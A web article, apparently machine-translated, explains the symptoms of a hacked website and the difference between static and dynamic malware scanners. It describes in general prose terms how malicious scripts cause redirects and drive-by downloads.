Website Malware Scanner

Your website is hacked or infected

Sooner or later, a web developer, webmaster or any website owner, who serves the site can face security problems: the resource falls under the sanction of the search engine or starts to be blocked by the antivirus, hosting can send a notification about the detection of malicious code, and visitors begin to complain about Pop-up ads or redirects to “left” sites.There are also many other symptoms of infection of your website that are important to know, we have described them in great detail here

At this point, the problem arises of finding the source of the problem, that is, diagnosing the site for security problems. With a competent approach, diagnostics consists of two stages:

Website antivirus scanner

The first and most important is to scan all files and databases located on the server. Ideally, you should take care of installing a quality virus scanner or antivirus on the site to update malicious code. The antivirus diagnostic the files and database on the hosting for the presence of server-side malicious scripts and injections

Malware online scanning

In the event that you do not have a professional malware scanner installed, scanning you can doing express scanning by the any online serves , but you will not get a full diagnostic. All the on-line online scandals conduct diagnostics only of the external code of the pages and do not check the files of your website on hosting. The scanner checking the site pages code for virus injection, hidden redirects no more. It is important to at least select a scanner that does not only static but also dynamic site scanning. The only advantage of a dynamic scanner is the rapid definition of a redirect to malicious sites

What is dynamic and static malware scanner

Static scanner functional

Static analysis of pages is the search for malicious inserts (mostly javascript), spam links and spam content, phishing pages and other static elements on the checked page and in the connected files. Detection of such fragments is performed based on the signature database or some set of regular expressions. If the malicious code is constantly present on the page or in the downloaded files, and is also known to the web scanner (that is, it is added to the signature database), the web scanner will detect it. But this does not always happen. For example, malicious code can be downloaded from another resource or perform some unauthorized actions under certain conditions:
• When the page is loaded, javascript is added to it, which executes a drive-by download attack
• the user leaves the page, at this point the code is loaded and opens the popunder with the content “for adults”
• the visitor of the site is on the page for a few seconds and only after that he is redirected to a paid subscription for SMS and etc.

Dynamic scanner functional

If it is not known in advance which code provokes these unauthorized actions, then it is extremely difficult to detect it by static analysis. Fortunately, there is a dynamic analysis or sometimes it is also called “behavioral”. If the web scanner is smart, it will not just analyze the source code of the page or files, but also try to perform some operations, emulating the actions of the real visitor. After each action or under certain conditions, the scanner robot analyzes the changes and accumulates data for the final report: loads the page in several browsers (and not just from different User-agents, but with different values of the navigator object in javascript, different document.referer and Etc.), accelerates the internal timer, catches redirects to external resources, tracks what is passed to eval (), document.write (), etc. An advanced web scanner will always check the page code and objects on it both before the execution of all scripts (immediately after loading the page) and after a while, as modern “malware” dynamically add or hide objects to javascript, and also perform background downloads Inside dynamic frames. For example, the code of an infected widget can, in 3 seconds or after the mouse movement, load a script that inserts into the javascript page with a redirect to download a dangerous .apk file. Naturally, no static analysis (except to know in advance that the widget is dangerous) or search by files will not reveal this.

How to find the right scanner

And now, with an understanding of the requirements for diagnosing the site and web scanners, let’s try to find those that are really effective. Unfortunately, what is presented on the first page of the search engine on the request to “check the site for viruses online” is nowhere to go anywhere. This or “crafts,” which at best can perform a static page analysis (for example, find an IFRAME that may not be dangerous), or third-party API aggregators that check the URL of the site using the Google Safe Browsing API, the Yandex Safe Browing API or VirusTotal API.

If you check the site with a desktop antivirus, then the analysis will most likely also be static: the antivirus skilfully blocks downloads from infected sites known to it, but one does not expect any deep dynamic analysis of the site pages from it (although some antiviruses do indeed detect the signatures in files and on the page ).

In the end, after checking two dozen well-known services, I would like to dwell on the ones presented below.